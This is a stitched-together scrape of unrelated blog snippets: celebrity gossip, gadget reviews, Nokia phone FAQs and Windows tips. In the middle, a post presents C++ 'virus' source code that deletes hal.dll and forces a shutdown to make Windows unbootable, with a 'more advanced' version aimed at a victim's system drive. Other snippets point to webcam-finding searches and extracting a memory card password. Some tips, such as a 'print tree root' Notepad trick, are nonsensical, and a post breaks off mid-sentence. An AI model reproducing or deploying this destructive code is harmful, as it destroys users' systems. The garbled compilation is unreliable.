Hilary Duff s father has been released from prison just a day after he was jailed over a bitter court battle with his estranged wife over their famous daughter's 21st birthday party.

Bob Duff was released from a Texas jail on Thursday, August 28, after being ordered to spend up to 10 days in there for contempt of court and pay $12,500 to his ex-wife for the star's 21st birthday party and a present.

Susan and Bob Duff are currently in the middle of a two and a half year divorce battle.

Duff was also ordered to pay the $367,537 he earned from selling stocks last month into a court repository.

The Sopranos star James Gandolfini has married his partner Deborah Lin in an intimate ceremony.

The couple exchanged vows in front of family and friends at Central Union Church in Lin's hometown of Honolulu, Hawaii, on Saturday.

Gandolfini's best man was his 8-year-old son Michael from his first marriage to Marcy Wudarsk, which ended in 2002.

A wedding guest tells People.com, "There was a nice big kiss at the end with both hands on the cheeks. They looked great."

Gandolfini, 46, and former model Lin, 40, have been engaged since late last year.

The Mini car is as British as bangers and mash with a rich racing heritage and a style that's been swinging since the sixties, and now Selfridges have unleashed the classic as a luggage line.

"Designed in Italy by a British designer, you can bag one of four lines"

Designed in Italy by a British designer, you can bag (sorry) one of four lines, Black Jack, Check Out, Pop Style of Go Fast. Teaming up with Mandarina Duck, the Anglo-Italian arrangement has given us some classic cases of the highest workmanship.

We picked out the Black Jack compact laptop bag sporting a subtle union flag design and sporty chequered lining for closer inspection. Every Mini driver has tried to beat the record number of passengers at some stage, but we tried the same thing with the Mini bag and our favourite tech toys. It turns out the Black Jack case can comfortably carry a 13-inch laptop, SLR camera and headphones, with a choice of padded pockets for your smaller-ticket items like a BlackBerry and iPod Touch. It's pockets galore and even when you fill them all, the bag still manages to keep its shape.

There's no real waterproofing going on here, but the stitching along the real leather seams is perfect and there's no imminent danger of the metal strap buckles giving way. For a day trip, or work duties, the laptop brief is ideal, but if you need something a little larger, there are a couple more Black Jack cases in the range.

It's tough working at T3. Just the other day we did a shoot using the Audi R8. Not only did I have to spend all day driving it around and chatting with the cover model, I also had to take it home at the end of the shoot and look after it.

A rear-mounted camera shows where you're going without craning your neck

Tough, as I say.

Now this thing gets you looks. I lost count of the number of times fellow drivers nearly crashed because it held their gaze as they went round a roundabout. One man wound down his window to shout "Nice car!" at me. And a chav was reduced to just stomping his foot as I sped past, as if to say "Look a that doggone auto-mow-beel, ma!"

But it's got some pretty nifty gadgets too. A rear-mounted camera, for instance. Put it in reverse and you can see where you're going without craning your neck. And turn the wheel and it maps out your turning circle with some handy drawn-on skidmarks.

Granted it won't blow people away like the acceleration will, but I was impressed. As was everyone I showed it to.

The in-built satnav is also really cool. For a start it actually works well, unlike most in-car models I've used. And it shows up a next turn indicator on the dashboard, so you don't have to look at the screen to see where to go. It's done in bright red pixels, just like Knight Rider, which is never bad.

So it looks awesome, makes you feel like a big man, and packs some really cool gadgets. Quite simply the best car I've ever driven.

This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

Warning: Do not try this on your home computer.

The Original Code:

Code:

#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:

Code:

#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.

Thousands of web cams and security cameras around the globe broadcast live images from offices, street corners, and other public and private areas through the internet. Since many cameras use known protocols to transmit live video streams over the web, it's quite easy to search for publicly accessible web cams. Sometime, you can even possibly control the cameras online.

You can search for this live streaming videos via Google search ( some publicly-viewable web cams whose operators may not be fully aware that said web cams are publicly viewable.)

Here are the keywords to search for.Just copy and paste to Google search bar..

My phone is requesting a PIN/PIN2/PUK/PUK2 code.
Your phone is equipped with one or more codes to protect it against unauthorized use. The PIN and PUK codes actually protect the SIM card, a small card inside your phone that establishes the network connection.

In most cases, your operator or service provider is the best source of assistance with PIN and PUK codes.
The most common code is the PIN (Personal Identification Number) code, which you set yourself and can activate and inactivate by following the instructions in your user guide.
The PIN2 code is a PIN code which acts as a second layer of protection for certain features of your phone. It functions in the same way as the PIN code, and more information is available in your user guide.
If the PIN code is entered incorrectly multiple times, your phone may request a PUK (Personal Unblocking Key) code. The PUK code is an 8-digit code provided by your operator or service provider.
If the PIN2 code is entered incorrectly multiple times, your phone may request a PUK2 code.
Please contact your operator or service provider for assistance with your PIN and/or PUK codes. If you have already contacted your service provider and the code provided did not work, you will have to obtain a new SIM card from your operator or service provider.

2. My phone is requesting a security code.
Your phone is equipped with one or more codes to protect it against unauthorized use. Please note that the security code, which protects the phone itself, differs from the PIN code, which protects the SIM card.

If your phone is prompting you for a security code and you have not activated one, please try the following:
Enter the default security code: 12345. Only try this once.
If your phone still requests a security code, please bring it to the nearest Nokia service center for inspection. You can find service center addresses from the drop-down menu at the bottom of Repair.

Please note:
Some operators configure phones so that they only work with their brands' SIM cards. In this case, if you enter the wrong code three or more consecutive times, the phone may lock permanently. If this happens, contact your operator or service provider for assistance.
In other cases when you enter the wrong code three or more consecutive times, the phone switches to a "sleep mode" and does not accept any entries for the next 15 minutes. In this case, power the phone off, then back on, let it sit idle or untouched for 15 minutes, then try again or bring it to a Nokia service center.

3. My phone displays "SIM card rejected" or "SIM card unaccepted".
The SIM (subscriber identity module) card is a small card inside your phone that establishes a network connection. The SIM card is provided by your operator or service provider. In most cases, they are the best source of assistance with SIM card problems. Your phone may display a SIM card error message if:
The SIM card is out of alignment. If the phone has recently been dropped, bumped, or opened, the SIM card may need adjusting. Follow the SIM card installation instructions in your user guide.
The PUK (Personal Unblocking Key) code is entered incorrectly multiple times. This can inactivate the SIM card. If inactivation appears to be permanent, contact your operator or service provider for a new SIM card.
You have recently changed service providers. In this case, either your SIM card or your phone may be configured for your previous operator and may require reconfiguring. It may also be that your phone is configured so that it cannot be used with a SIM card from a different operator or service provider. Please contact your current operator or service provider for assistance.
If none of the situations above apply and you continue to receive this error message, your SIM card may be damaged. Please contact your operator or service provider to have the SIM card tested and/or replaced. Or alternately, bring your phone to the nearest Nokia service center for inspection. You can find service center addresses from the drop-down menu at the bottom of Repair.

4. Why is an IMEI (International Mobile Equipment Identity) number important and how do I retrieve the IMEI number from my mobile?
The IMEI number is a 15 digit unique code that is used to identify a mobile phone to a GSM network. The IMEI number can be retrieved by keying in *#06# and the 15 digit unique code will be displayed on the screen. In the unfortunate event that your mobile is misplaced, provision of this IMEI number to the police and telco service provider would be useful.

5. I lost my phone. How do I block the phone to prevent unauthorized use?
Nokia does not have a system to block the phone. However if you were to provide us the phone’s IMEI number, we can alert the Authorized Service Centers about the lost phone. You are also advised to make a police report.

6. My series 60, 80, 90 Nokia phone has a virus. How do I remove it?
Removal of the Mobile Virus in series 60, 80, 90 Nokia phone can be done in several ways such as downloading the 3rd Party Mobile Anti-Virus applications. This is also dependent upon the type of virus infecting your phone.
You can refer to the 3rd Party Mobile Anti-Virus applications support for instructions on how to disinfect the Mobile Virus in your phone.
To learn more about how to protect your mobile phone, check out this link - www.nokia.com/security.

Katrina's birthday part was hot news all around and still seems it is not going to get off from the news. Earlier news were that Salman proposed Katrina to marry him in the party and now the news are about the fight between Shahrukh Khan and Salman Khan, the war of words which almost got urged to the physical fight.

The party of Katrina's birthday, keyed by Salman Khan at Olive Bar and Kitchen, Bandra was attended by many biggies of Bollywood. And this is when Salman and Shahrukh got heat up on some argument. As per the local news paper of a Mumbai, Salman was high when Shahrukh entered the party with Gauri. Seems Salman was not already happy with Shahrukh as he recently denied Guest Appearance in movie produced by Salman Khan named "Main Aur Mrs. Khanna" .

Salman started taunting him and said that his show "Panchvi Paas" a total failure, earlier Shahrukh took it as fun but later on the atmosphere between two got heat up and Salman even said that he will beat Shahrukh, Shahrukh became more aggressive, said he will beat him in his party. It was almost a physical fight but Gauri just interrupted in time and said she wanted to leave. Both Shahrukh and Gauri left the party.

News are that later on, when Salman got cooled down, Aamir took Salman to Shahrukh's place and then both had a long talk. Most preferably a sort of patch up.

Interesting point is that this news came out much after the incident happens. Well, seems Khans were committed to keep it secret as things seems settled now but you know, news is out and we all know it !

The value DefaultColor controls the foreground and background colors used in command prompt windows. It has a default value of 0, for standard white text on a black background.
CHANGING DOS BACKGROUND
Open your registry (press win+r and type regedit , hit enter )
goto

[HKEY_CURRENT_USER\Software\Microsoft\Command Processor]

u'll find "DefaultColor"

You can replace it's value with a two-digit hexadecimal number, in which the first digit selects a background color and the second a foreground color. The hexadecimal codes are:

Hexadecimal value Color
0 Black
1 Blue
2 Green
3 Aqua
4 Red
5 Purple
6 Yellow
7 White
8 Gray
9 Light Blue
A Light Green
B Light Aqua
C Light Red
D Light Purple
E Light Yellow
F Bright White

A value of F0, for example, would give black text on a white background, and 1E would yield yellow text on a blue background.

Some times it happens that you forgot the password of your memory card and you have lots of your important data in your phone.
So there are two types of methods for recovering the password of your memory card with the help of nokia phone.
For Nokia s60 1st and 2nd edition phones.
1. First Install FExplorer in your phone memory.
2. Got to drive C: , you will find a file called mmcstore
3. Send it to your pc directly and open it in notepad or rename the file.
4. At the end of the file you will find your password.
For Nokia S60 3rd Phones, Nokia N-Series and Nokia E-Series
There is almost no way yet known to hack the memory card password in case of these types of phone but there is a way to do it some of the s60 3rd edition phones and almost all the E-series phones.
The remote lock option in E-Series phone allows you to unlock your phone by sending a sms.
The only thing you have to do is to activate this feature by going to Tools | Settings | Security | Phone and SIM | Allow remote lock menu. The password of your memory card will be your remote lock message.
So you have to just send a sms containing your remote lock message that will automatically change your memory card passsword.
If you have any queries in following the above procedure leave a comment here.

If you are using a desktop computer, chances are that you don’t want the computer to go to sleep automatically. This is even more the case if you are running Vista in a virtual machine for testing purposes.
Disabling power management is simple and easy. First go to the start menu and click on the Control Panel.
Click on the System and Maintenance link:

Then click on the Power Options link:

Then select High Performance:

This will disable the automatic sleep mode, but will still turn off the display. You can click on Change Plan Settings to disable that as well if you want.

pcworld.com — The United States will close its digital divide significantly within the next four years, with 77% of U.S. households having a broadband Internet subscription, according to a new Gartner study. Just over half of U.S. households currently subscribe to broadband Internet services, but Gartner predicts that percentage will grow by more than 20 points.

The eye massager is a peripheral shaped like two fingers ready to attempt a Three Stooges-style eye poking. So it makes perfect sense that they'd sell it as a USB device meant to be used around your eyes. It has two distinct vibrating settings: high speed, (which we're assuming is fatal since it would vibrate right into your brain) and low speed (which, while not fatal, probably causes major retinal damage and subsequent blindness).

On the upside, according to the creators, this is pretty much mankind's greatest invention ever. Not only does it soothe your aching eyeballs, it also relieves tension in the central nervous system, aids digestion, stimulates the lymphatic system and fights against infection by boosting your immune system. The creators are already working on a USB back massager that cures cancer.

Why It's Pointless

Before you enthusiastically plunge this device into you eye socket, consider this: why on Earth should you risk blindness when you could just use your own fingers to massage your eyeballs? We aren't entirely convinced by the creators' claims about the devices' supposed magical healing capabilities either. We're not saying they're lying (legally we can't), we're just saying they have something in common with Pinocchio (i.e. both are fucking liars). If you're still considering buying this, then we urge you to take the price into account. We can assure you that there is a multitude of less expensive ways to blind yourself such as peppering the eyeball or a good old-fashioned eye stabbing.

The USB Mouse Jiggler is a USB device that you plug into your computer. The device 'jiggles' your mouse around every few minutes so the sleep mode or screen saver doesn't come on, presumably so you can snooze in front of your computer and still look like you're working.

Why It's Pointless

Inventing gadgets for the lazy man is what makes America great (hell, we use Segways on our treadmills) but paying $30 for something that replaces 10 seconds worth of mouse clicking (the amount of time it would take you to adjust the sleep mode timer) is on a whole different level of laziness. This is on the level of hiring a guy to operate your TV remote for you.

HOLLYWOOD - When aspiring pop stars take to the stage for the next season of American Idol, they will be facing more “constructive” criticism than ever: Fox announced on Monday that a fourth judge would be added to the panel.

Grammy-nominated songwriter Kara DioGuardi, whose work will probably be much more familiar to audiences than her name, will join judges Simon Cowell, Paula Abdul and Randy Jackson and host Ryan Seacrest when the eighth season kicks off in January 2009.

It’s a major shakeup for America’s most-watched TV show and its three-judge tradition. There hasn’t been a major personnel change since Brian Dunkleman failed to rejoin Seacrest as co-host of the show after season one.

In a statement, Mike Darnell, President, alternative programming of Fox, offered this explanation: "For the past seven seasons, Paula has had to endure the experience of being the only woman at the judges' table. She's been as an island of consideration and gentle criticism between Randy and Simon, offering her invaluable expertise as a performer and No. 1 artist to the thousands who have competed on American Idol. With Kara by her side, Paula finally has some back-up and now there is going to be a lot more 'girl power' on the show."

Idol’s creator and executive producer Simon Fuller, meanwhile, sang the praises of DioGuardi. "She is a smart, sassy lady, and one of America's most successful songwriters. We know she will bring a new level of energy and excitement to the show," said Fuller in a statement.

DioGuardi boasts a highly successful and prolific history, having written songs performed by the likes of Celine Dion, Christina Aguilera, Gwen Stefani, Miley Cyrus, Faith Hill and Santana, as well as almost every former Idol contestant who has gone on to stardom.

There has been scant speculation that Idol’s most (in)famous judge, Cowell, will soon walk away from the show, and DioGuardi’s arrival could start a rumor frenzy.

HOLLYWOOD - There have been multiple adaptations of the mystical story Alice in Wonderland--Tim Burton is scheduled to put his spin on the classic story with his new film Alice slated for release in 2010.

An unknown Australian actress has won the title role in Burton's eagerly awaited adaptation, according to WENN.

Teenager Mia Wasikowska is set to hit the big time after being picked to play the heroine in the movie version of Lewis Carroll's classic.

The director is reportedly lining up long-time muse Johnny Depp to play the Mad Hatter in the film.

And newcomer Wasikowska, 18, will be treading on the toes of Lindsay Lohan, after the Mean Girls star reportedly begged Burton not to choose an unknown for the role, insisting she was "ideal" to play the part.

Wasikowska says, "I'm so so excited. The book's really intrigued me when I was little and I've always loved the story. I really love (Burton films) Edward Scissorhands and Big Fish."

Earlier this year, Wasikowska was chosen as one of only two Australian actresses to receive a Heath Ledger scholarship, a fund to help young up-and-coming Aussie performers in memory of the late actor.

The Organization for Economic Cooperation and Development (OECD) has released updated broadband data that finds the US still in 15th place worldwide. While that's not a total catastrophe, the US has been sinking for several years (it was fourth in 2001) and has yet to show any real signs of improvement. But broadband in general is booming, growing 187 percent since 2004 in OECD countries. During that same period, average advertised speeds rose from 2Mbps to 9Mbps and prices plunged. Broadband remains red-hot, even in the coldest climates, and nothing is hotter than fiber-to-the-home, which now accounts for 8 percent of all OECD broadband connections.

We reported on an earlier OECD paper that outlined why fiber optics would be the backbone of the broadband future, even when the last-mile link is delivered by cable or DSL. The new OECD data shows just how quickly fiber direct to the home is progressing; it now makes up a stunning 40 percent of all broadband connections in Japan and 34 percent in Korea. The US comes in 11th in FTTH with a percentage point or two.

DVD-RAM is a disc specification presented in1996. which specifies rewritable DVD-RAM media and the appropriate DVD writers. DVD-RAM media have been used in computers as well as camcorders since 1998. The direct successor of this format will be HD dvd-ram.

HD DVD-RAM

hd dvd-ram is the proposed successor to DVD-RAM for random access on optical media using phase-change principals. HD DVD-RAM will hold 20 gigabytes per layer instead of 15 gigabytes for HD DVD-RAM-r because of differences in recording methods used, yielding a higher density disc.

HD DVD-R

is the writable disc variant of HD-DVD and is available with a single-layer capacity of 15GB or dual-layer capacity of 30GB. Currently, HD DVD-R has slower write speeds than the competing BD-Rformat (1–2x vs 1–4x) and lower storage capacity.

Pricing of HD DVD devices and blank media is yet to be released (September, 2006), but it is expected that devices will be available at a lower price-point than the competing Blu-ray Disc format.

Blue-ray disk

A Blu-ray Disc (also called BD) is a high-density optical disk format for the storage of digital media, including high definition video.

* About 9 hours of high-definition (HD) video can be stored on a 50 GB disc.
* About 23 hours of standard-definition (SD) video can be stored on a 50 GB disc.
* On average, a single-layer disc can hold a High Definition feature of 135 minutes using MPEG-2, with additional room for 2 hours of bonus material in standard definition quality. A dual layer disc will extend this number up to 3 hours in HD quality and 9 hours of SD bonus material.

To change the interval that Windows updates the time using the internet time servers via regedit, navigate to:

1. HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services \W32Time\TimeProviders\NtpClient
2. Select "SpecialPollInterval"
3. Change decimal value from 604800 to a different value in seconds. i.e.: 172800 (2 Days) or 86400 (1 Day) and so on.

We don't recommend changing this unless you are on a broadband connection

Here are 10 reasons why I dont like Iphone....
1. Terrible Battery Life:
The trade off for all the wonderful functionality on the iPhone 3G is poor battery life. Running WiFi, Bluetooth, GPS, iPod, and mobile phone capabilities at the same time will suck the living daylight out of any gadget. I’m sure Apple knew this, so one has to ask why didn’t they bump up the milli-amps to cater for this? Could this also be a reason why Apple didn’t include more bluetooth functionality such as A2DP or Bluetooth data file sharing abilities?

2. No Bluetooth Data Transfer

Yup, you heard right, the Apple iPhone cannot transmit data files over Bluetooth. Kinda sad if you want to transfer your photos to friend’s phone or PC. For those in the U.S. blessed with lavish data plans this isn’t an issue as you can send via internet/email. However, for the Australian Telstra iPhoners who are without all-you-can-eat or even remotely generous data plans this can be an expensive data transfer alternative. Guess we’ll just have to carry our USB cables on us wherever we go and hope that there will always be a free PC handy…not.

3. No full Outlook Sync Support
Contrary to what iPhone 3G non-business users will tell you, the iPhone does not fully sync with Outlook. More accurately, the iPhone 3G only syncs contacts and calendar events and does not sync notes or to-do list. This is annoying as I have a lot of notes created and stored from my Windows Mobiles days, not to mention my daily to-do list which keeps me on track. Now I have to install separate apps to store this info and squirm at the idea of re-inputting these items into those.

4. No default Cut ‘n’ Paste

Apple made many advances in portable device user interface technology however did not include one that has been part of our lives for many years - the simple cut ‘n’ paste ability. I used this on my previous Windows Mobile device to copy contact details, bank info, SMS bits and the like between different apps on my mobile gadget. However, this is a no go with the iPhone and we are ported back to the stone age where different apps could not share data on the fly with each other.

a. ok now, what you need to do is to run compmgmt.msc

b. and click on local users and groups.

c. once you've gotten here you need to open up the 'users' folder.

at this point i am walking along with you and notice that there are several
major security holes dealing specifically with the password:
1. double clicking on the any user name allows you a list that looks
something like this:
"user name"

full name: -----------------------
|__________________|

description: -----------------------
|__________________|
--
|_| user must change password at next logon

--
|_| user cannot change password

--
|/| password never expires

--
|_| account is disabled

--
|_| account is locked out

"ok" "cancel" "apply"

ok if you can get past my cheesy drawing, i must ask, did you notice that
the "password never expires" box is checked? if you did, then you may have
realized that this means that you can also uncheck it!

2. if ure paying attention, you'll see that the 'user must change password

Lose What You Don't Need
If you installed Vista yourself and have experience installing previous Windows OSes, you surely noticed that Vista hardly asks any questions about your computer—and what you plan to do with it—than did prior OSes. Windows Vista makes all kinds of assumptions about your computing habits and the features you may or may not need, and it inevitably installs some overhead that you simply don't need. You can get rid of it. Windows XP had the Add/Remove Windows Features button in the Control Panel Add/Remove Programs applet, and Vista has something like it.

1. Open Control Panel and click Uninstall a Program to launch Vista's Uninstall or Change a Program Window. In the Tasks pane on the left, click Turn Windows Features On or Off.
2. Check the list of features. Each feature is preceded by a check box which, if filled, indicates the feature is installed. If you hover the mouse over a feature, a help tool tip appears to tell you what it is.

2.
Do you really need Windows Meeting Space or Tablet PC components?
3. Uncheck any feature you don't need. Some of the features are headings with a sub-list below them; just click the little + sign to expand.

For my gaming system, I've purged everything except:

* Some of the games
* XPS Viewer (under .NET Framework 3.0)
* Remote Differential Compression (a network optimizer)
* Windows Ultimate Extras

Note that when you uncheck features, you're not removing these features from your system; you're simply turning them off so they don't sit in the background eating up resources. You can turn any of them back on by invoking this window and filling the check boxes.

If you are using a 64-bit (x64) version of Windows Vista, then this is something you should know. By default, the shortcut in the Start menu points to the 32-bit (x86) executable for Disk Cleanup. While Disk Cleanup will work fine from this shortcut for most things, there is one function that does not work correctly – the cleaning of System Restore points and Shadow Copies / Previous Versions.
Note that if you launch Disk Cleanup from another location in Windows, for instance by clicking the “Disk Cleanup” button on a drives properties window, it will launch the correct executable for Disk Cleanup.
If you want to correct the Disk Cleanup shortcut in the Start menu, follow these steps:

1. Click on Start, All Programs, Accessories, and then click on System Tools.
2. Right click on “Disk Cleanup” and from the context menu that appears click on “Properties”.
3. Change the “Target” from “%SystemRoot%\SysWOW64\cleanmgr.exe” to “%SystemRoot%\system32\cleanmgr.exe”.
4. Click on OK. If User Account Control prompts you for consent, click on Continue or provide the appropriate credentials.

With simply a computer and a connection to the world wide web you can access millions of Web servers, e-mail addresses, and a plethora of other vast and expanding new technologies but, it's not completely safe. Both your PC and personal information is at high risk.

Each day virus, spyware, and adware hackers come up with new, ingenious ways to gain access to your PC. These steps will help keep you safe:

Stop and think before you click: Downloaded files that end with .exe, .com, .bat, and .scr, as well as scriptable document files, including .doc and .xls, can render your computer completely useless with a single click. Most e-mail clients prevent access to any attachments so take an extra few seconds before you make a judgement on whether you trust the source and decide to open it or not.

Make use of a spam filter: Although most spyware and viruses make their way onto your computer via drive-by browser hijacking, spreading by email is still possible. Installing a junk-mail filter will decrease your chances of activating malicious scripts embedded in messages.

Ensure your antivirus applications are up to date: Using antivirus software that has expired past it's subscription period is definitely not an option: Not only do you lack the crucial virus database updates, but you expose your system to malware that targets known flaws in antivirus software.

Prevention against WORMS and Viruses: Install antivirus software, update regularly, and use it regularly. Never open unsolicited e-mail attachments.Disconnect your network or modem cable when you are not using your computer.

Antivirus software is software that is installed on your computer that protects you from viruses. Antivirus software programs can have between 40,000 - 120,000 "malicious software definitions" that receive constant updates.

I highly recommend Grisoft AVG Anti-Virus (Free) for antivirus protection.

If unsure get a 2nd opinion: You should only install and use one single antivirus program at a time on your computer because multiple antivirus programs will conflict with one another and cause your computer to completely grind to a halt. If you have any doubt about your antivirus program's effectiveness, you can use a free online virus scanner, such as Panda Software's ActiveScan) or Trend Micros HouseCall.

Approach downloading with caution: Any program you download and run on your PC could potentially result in spyware or virus infection. Download software only from reputable online sources that preferably have a strict no spyware policy.

Install a bidirectional firewall: Windows XP and Vista each come with a firewall that blocks incoming attacks; it is enabled by default in Windows XP Service Pack 2 and later. However for the best protection possible, you will also want to block unwanted outgoing connections made by spyware, viruses and scripts on your PC that attempts to either connect to a remote server or send out spam.

Windows Vista's firewall does have that fucntionality, but configuring it is not entirely simple enough for the average Windows user. You may be interested to know that, you can get one of several free bidirectional firewall programs, such as Zone Labs ZoneAlarm Free, or Agnitums Outpost Firewall Free.

Install a good antispyware program: Anyone who uses a computer can succumb to spyware infection. In fact, 9 out of 10 Internet-connected PCs are infected with some kind of malicious software. Spyware can be any application that tracks your online or offline PC activity, serves you adverts, redirects your pages and bombards you with pop-ups. If you use the Internet, its very much possible that some form of virus threats are already present on your PC.

Viruses can sometimes go undetected however, it is more likely that you will notice that it is present on your PC due to the obvious symptoms that your computer may experience. It is VERY difficult to get rid of but not entirely impossible.

Even if you think you have successfully removed an unwanted program manually, a remaining dormant file can trigger a complete reinstallation the next time you start your computer. And as a survival tactic, spyware programs often leave similar traces elsewhere on your system so you can often never eliminate it completely on one attempt.

Spyware, adware, and some scripts / trojans slow down your system, cause crashes, and track your online activity. Antispyware utilities work much like antivirus software, detecting and removing the unwanted software from your PC.

One free tactic you can employ is to upgrade from Windows XP: As Microsoft Windows service Pack 2 makes Windows XP much safer, however the operating system still has security holes, and it remains prime target for spyware authors.

If you still have a slow PC after trying the software above and you think it may be due to spyware, you can find more help and information on fixing your slow computer at Slow Computer Help.

NOTEPAD "world trade centre trick".. :

Did you know that the flight number of the plane that had hit WTC ...on 9/11 was Q33N ....Open your Notepad in ur computer and type the flight number i.e Q33N... Increase the Font Size to 72, Change the Font to Wingdings. U will be amazed by the findings.

log trick !! make ur Notepad a diary !!

Sometimes we want to insert current data and time, whenever we open the file in the notepad. If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this. Just add a .LOG in the first line of your text file and close it. Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that.

WHY?

The reason this happens:

In notepad, any other 4-3-3-5 letter word combo will have the same results. It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.

1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)
2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)
This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters

~ cheers ~

Changing Header and Footer

Ever printed the little text you wrote in Notepad? More often than not, the printout starts with “Untitled” or the filename at top, and “Page 1″ on bottom. Want to get rid of it, or change it? Click on File, Page Setup. Get rid of the characters in Header and Footer boxes, and write what you want as Header and Footer. Use the following codes.

&l Left-align the characters that follow
&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number

Print tree root

a. Open NOTEPAD and enter {print tree root}
b. After that hit enter and type C:\windows\system
c. After that hit enter and type {print C:\windows\system\winlog
d. Hit enter and type 4*43″$@[455]3hr4~
e. Then save the file as teekids in C:\windows\system.

If you want to change the "desktop wallpaper" you can go to Tools -> Settings -> Phone -> Standby Mode -> Background Image -> Click on "Yes" and then select the image you want to put as background.If you want to put an image instead of the operator name (in the right corner, between the clock and the battery meter) you need a more complicated "trick": - download and install eFileManager or SeleQ
- now go and create some folders in the phone under C:\system\Apps ... create the folder Phone, and under this one create the folder Oplogo you should have this folder created: C:\system\Apps\Phone\Oplogo - now you can put inside this folder (with eFileManger or SeleQ) the pictures you want to use as "operator logos"
- Click on image you want in Oplogo folder and scroll down to
- Click on SET AS OPERATOR LOGO
- Phone will reboot and new logo will be up
- Job done
- NOTE: - size of these pics must be 97x25 pixel Mine are .jpg.

Sometimes when you see interesting movie clip or image on website and click with right button of your mouse on them nothing happens. You see only a menu Zoom in or About Adobe Flash Player 9.. This is because flash objects doesn't have a download feature. However there is a free trick to save this movie on your computer. Indeed the truth is that you already have dowloaded it but it is well hidden in your browsers temporary folder. All you have to do is to go to that folder and resave it in your desired place.

* 1 step is to make sure that you can see hidden folders. To do that open no matter what folder and press Tools -> Folder options:

When folder options panel is open click on View bar and select radio button Show hidden files and folders and unselect Hide protected operating system files (Recommended). Press apply and ok.

* Step 2 Now you have to go to Temporary Internet Files folder and search for that flash movie file. To do that go to My Computer -> C disk -> Documents and Settings folder -> Your User Name (e.g. Bobby) -> Local Settings (this folder is hidden and looks like washed out) -> Temporary Internet Files (also hidden folder)

When you open Temporary Internet Files folder you see a bunch of various files. Try to sort them out by clicking on Type button

* Step 3 Now you have to find the movie clip you want to save. Scroll down until you see file type ShockwaveFlash Object. Here are a list of all flash files on web pages you have visited.

You can narrow search process by looking at Internet address column which should match your site url. Then manually check if the flash movie file is correct and when it is just right click on it and select copy anywhere you want

Notice: in order to play flash movie file locally on your computer you have to install flash player, otherwise windows will not recognize flash file as playable. One way to get rid of this situation is to drag flash movie files on open internet explorer window, then it will play on the entire browser window.

That's it, now you have flash movie on your computer saved.

Tip!

If your Temporary Internet Files Folder contains too much files try to delete them all and refresh browser where flash clips are. Those files should be downloaded again into TIF folder so you don't miss them.

How often do you use your keyboards' hotkeys to make things go faster? Did you know that you can minimize all your windows at the same time only with 2 keys combination? If not I suggest you to read further. Hotkeys or keyboard shortcuts are very helpful when you want to do a predefined operation like copying, cutting, managing your desktop windows and so on. There are many hotkeys in windows operating system. Some of them are very handy others in my opinion are only needed if you somehow manage to break your keyboard. So let's go to my top 10 favorite hotkeys. 10 place Ctrl+Alt+Del this combination can save you from lot of trouble, for example when your computer freezes you can open task manager with your hotkey combination and try to terminate it by right clicking on the program and choosing End task. I think this is a combination that every user should know. It was especially helpful during Windows 98 era. Ctrl+Alt+Del combination brings you a Windows Task Manager window where you can manually shut down unresponsive application

9 place Ctrl+Z combination undo every step you've done. If you renamed or moved some file and want to undo that just press the Ctrl button and while keeping it pressed click Z. This brings your file back where it was or renames to original file name. This combination also works by default in various programs such as word, excel, paint, flash, dreamweaver and so on. In some programs you can undo even hundred steps. I can recall one situation when this hotkey combination helped. One of my acquaintance accidentally deleted huge portion of text which he wrote in notepad and began to blame everyone for this, and I said him that he might try Ctrl+Z. And that worked, he saved a ot of time though. 8 place Ctrl+C This combination copies whatever you're selected, it can be text, images or files on your computer. It is faster to press Ctrl+C than right click on the item and wait for the menu to drop in. When you install many programs your right click menu expands almost along whole screen so it becomes difficult to find that copy slice. I also experienced that when you insert obviously damaged cd or dvd into dvd-rom and open by right clicking it to copy some undamaged files in order to save what you can the cd becomes unresponsive. Sometimes you can avoid that by just selecting files and using this hotkey. 7 place Ctrl+A combination selects all the text in the working area. It can be notepad, word document or webpage. This is convenient if the text large and in order to select everything you should scroll up and down. 6 place F2 is a rename hotkey in windows. You don't have to right click on it. There is another way to rename files by selecting file you want to rename and clicking one more time on it, but if you're in a hurry you could easily do double click and windows recognizes this as a signal to open the file. 5 place Ctrl+X cuts selected element. This combination also speeds things up and you don't have right click. Just simply select file(-s) you want to cut and press Ctrl+X. After that you notice that images of those files becomes obscured. 4 place Drag with Ctrl. When you drag files between open windows you move them from one location to another, but if you want to copy them press Ctrl and drag, this leaves original files in their place and copies in new location. 3 place Ctrl+V. It performs paste operation and also speeds up your work with file management. 2 place Alt+Tab. This is very decent hotkey when you have many windows open. By pressing Alt and Tab you could quickly navigate through open windows and go to desired application. Keep clicking on Tab button until your application is framed, then release Alt and here you are. 1 place Ctrl+Alt+YOURBUTTON This is my favorite hotkey because you create it yourself. This hotkey can launch any program which is in your start menu or shortcut on desktop. I'll show you how to create your own hotkey for launching winamp: Firstly locate where is your winamp shortcut and right click on it. Then go to properties and press mouse on shortcut key line

then type 1 letter (for example W) which you can easily remember. Press Apply and Ok buttons to save your hotkey. Now whenever you want to start winamp just press Ctrl+Alt+W That is 10 hotkeys that I often use, you probably knew some of them but I want emphasize that in order to do things quickly you must learn to work not only with your mouse but keyboard also.

To start, let's define a couple of terms:

* A wildcard character is a keyboard character that you can use to represent one or many characters. For example, the asterisk (*) typically represents one or more characters, and the question mark (?) typically represents a single character.
